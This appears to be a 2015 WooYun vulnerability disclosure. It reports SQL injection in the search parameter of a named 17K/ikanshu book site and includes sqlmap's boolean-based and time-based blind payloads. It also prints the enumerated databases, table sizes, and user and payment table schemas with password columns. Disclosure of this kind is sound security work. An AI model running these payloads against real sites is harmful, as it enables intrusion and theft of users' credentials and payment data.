乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-12: 细节已通知厂商并且等待厂商处理中 2015-09-16: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向核心白帽子及相关领域专家公开 2015-10-06: 细节向普通白帽子公开 2015-10-16: 细节向实习白帽子公开 2015-10-31: 细节向公众公开
rt
http://ssqj.qiye.ikanshu.cn/搜索处
抓包注入点
http://ssqj.qiye.ikanshu.cn/org!bookList.xhtml?qiyeId=4&searchKey=a*
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND 8528=8528 AND '%'=' Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND SLEEP(5) AND '%'='---web application technology: JSPback-end DBMS: MySQL 5.0.11
数据库
web application technology: JSPback-end DBMS: MySQL 5.0.11available databases [19]:[*] ads[*] banquan[*] ca_web_pay[*] cdps[*] client_user_center[*] desay[*] information_schema[*] qiye[*] resource_auth[*] resource_process[*] skymobi_1[*] skymobi_2[*] skymobi_3[*] skymobi_4[*] skymobi_5[*] test[*] wap_17k[*] xinhua[*] zentaotask
当前库
current database: 'qiye'
数据量
Database: qiye+--------------------+---------+| Table | Entries |+--------------------+---------+| bookchaptercontent | 645223 || bookchapter | 645214 || pv_log | 126977 || qiye_book | 55327 || bookview | 55034 || bookvolume | 46820 || qiye_book_bk | 19146 || book | 7470 || area | 3511 || tmp_id | 3017 || special_book | 2430 || qikan_data | 2119 || `user` | 1836 || doc | 676 || read_history | 527 || data_category | 387 || special_book_1211 | 360 || special_book_bk | 250 || news | 170 || fav_history | 137 || qikan | 79 || zan_history | 77 || activity | 61 || comment | 53 || user_amountlog | 41 || fav_doc_history | 40 || data_authorized | 33 || user_feedback | 32 || feeduser | 29 || bookcategory | 28 || comment_hd | 24 || qiye | 23 || special | 11 || activity_winner | 5 || user_amount | 4 || book_off | 1 |+--------------------+---------+
user的字段
Database: qiyeTable: user[13 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| create_date | datetime || email | varchar(255) || id | int(11) || info | varchar(255) || last_login_time | datetime || logo | varchar(200) || name | varchar(200) || nick_name | varchar(100) || password | varchar(50) || qiye_id | int(11) || status | smallint(3) || tel | varchar(50) || update_date | datetime |+-----------------+--------------+
可以跨库wap_17k
Database: wap_17k+--------------------+---------+| Table | Entries |+--------------------+---------+| bookcomment | 79887 || paylog | 56624 || yeepayorder | 20874 || yeepayresponse | 20212 || useramountlog | 4332 || userbookmark | 3980 || `user` | 3425 || useramount | 3196 || userbookchapterlog | 1291 || feedback | 620 || room_msg | 126 || cmsbook | 53 || cmscategory | 11 || adminuser | 6 |+--------------------+---------+
yeepayorder 疑似订单信息
Database: wap_17kTable: user[16 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| domain | varchar(50) || age | int(5) || birthDate | date || email | varchar(255) || hobby | varchar(255) || id | int(11) || lastLoginDate | datetime || loginTimes | int(11) || logoImg | varchar(255) || mobile | varchar(20) || nickName | varchar(255) || password | varchar(16) || qq | varchar(30) || regTime | datetime || sex | tinyint(2) || share | tinyint(1) |+---------------+--------------+
危害等级:高
漏洞Rank:15
确认时间:2015-09-16 10:11
十分感谢您对17K网站的关注,祝您工作愉快!
暂无
